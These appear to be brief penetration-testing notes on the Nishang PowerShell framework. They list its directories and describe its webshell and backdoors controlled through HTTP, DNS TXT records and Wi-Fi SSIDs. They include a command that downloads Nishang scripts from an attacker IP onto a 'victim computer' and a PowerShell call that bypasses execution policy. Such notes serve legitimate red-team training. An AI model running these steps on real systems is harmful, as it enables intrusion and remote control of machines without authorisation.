Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of pene

Link: https://github.com/samratashok/nishang

Also installed by default on Kali:

root@kali:~# ls -l /usr/share/nishang/ 
total 48 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Antak-WebShell 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Backdoors 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Escalation 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Execution 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Gather 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Misc 
-rw-r--r-- 1 root root  495 Jun  4 11:14 nishang.psm1 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Pivot 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 powerpreter 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Prasadhak 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Scan 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Utility

We will need to upload the nishang scripts into the victim computer:

powershell iwr -uri 10.10.14.14/{Nishang script}

Load the script:

powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script.ps1

Scripts

Nishang currently contains the following scripts and payloads.

ActiveDirectory

Get-Unconstrained – Find computers in active directory which have Kerberos Unconstrained Delegation enabled.

Antak – the Webshell

Antak – Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell.

Backdoors

HTTP-Backdoor – A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.

DNS_TXT_Pwnage – A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.

Execute-OnTime – A backdoor which can execute PowerShell scripts at a given time on a target.

Gupt-Backdoor – A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.